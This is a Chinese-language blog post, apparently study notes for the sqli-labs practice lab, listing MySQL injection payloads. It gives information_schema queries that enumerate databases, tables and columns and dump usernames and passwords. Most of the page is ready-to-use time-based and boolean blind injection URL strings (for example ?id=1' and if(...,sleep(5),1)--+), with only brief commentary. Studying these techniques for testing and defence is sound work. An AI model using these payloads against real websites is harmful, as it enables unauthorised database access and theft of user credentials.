zoukankan      html  css  js  c++  java

  • mysql注入语句

    一、sql注入语句

    爆破所有数据库:

    (select group_concat(schema_name) from information_schema.schemata)

    获取数据库所有表:

    (select  group_concat(table_name) from information_schema.tables where table_schema='mysql')

    获取所有列名:

    (select group_concat(column_name) from information_schema.columns where table_name='users')

    获取所有用户密码:

    (select group_concat(password) from security.users)

    (select group_concat(username) from security.users)

    盲注

    方法一:时间延迟型手工注入

    1.爆库长

    ?id=1' and if(length(database())=8,sleep(5),1)--+

    明显延迟,数据库长度为8.

    2.爆库名

    ?id=1' and if(left(database(),1)='s' ,sleep(5),1) --+

    ?id=1' and if(left(database(),8)='security' ,sleep(5),1) --+

    明显延迟,数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)='security'

    3.爆表名

    ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1) --+

    ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,2),1)='us' ,sleep(5),1) --+

    ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,5),1)='users' ,sleep(5),1) --+

    4.爆列名

    ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+

    5.爆用户和密码

    ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

    ?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

    注意:limit 按照id排序,limit 从0开始.

    方法二,布尔型手工注入

    在布尔型注入中,正确会回显,错误没有回显

    1.爆库名

    id=1' and length(database())=8--+

    ?id=' and left((select database()),1)='s' --+

    ?id=' and left((select database()),2)='se' --+

    2.爆表名

    ?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

    3.爆列名

    ?id=1'and left((select column_name from information_schema.columns  where table_name='users'limit 2,1 ),8)='password' --+

    4.爆用户和密码

    ?id=1' and left((select username from users order by id limit 0,1),1)='d' --+

    ?id=1' and left((select password from users order by id limit 0,1),1)='d' --+
  • 相关阅读:
    Solution: Win 10 和 Ubuntu 16.04 LTS双系统, Win 10 不能从grub启动
    在Ubuntu上如何往fcitx里添加输入法
    LaTeX 笔记---Q&A
    Hong Kong Regional Online Preliminary 2016 C. Classrooms
    Codeforces 711E ZS and The Birthday Paradox
    poj 2342 anniversary party
    poj 1088 滑雪
    poj 2479 maximum sum
    poj 2481 cows
    poj 2352 stars
  • 原文地址:https://www.cnblogs.com/dyanbk/p/11237140.html
Copyright © 2011-2022 走看看